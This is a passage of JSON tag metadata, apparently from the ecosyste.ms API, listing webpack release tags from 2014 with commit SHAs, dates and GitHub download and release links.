sts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3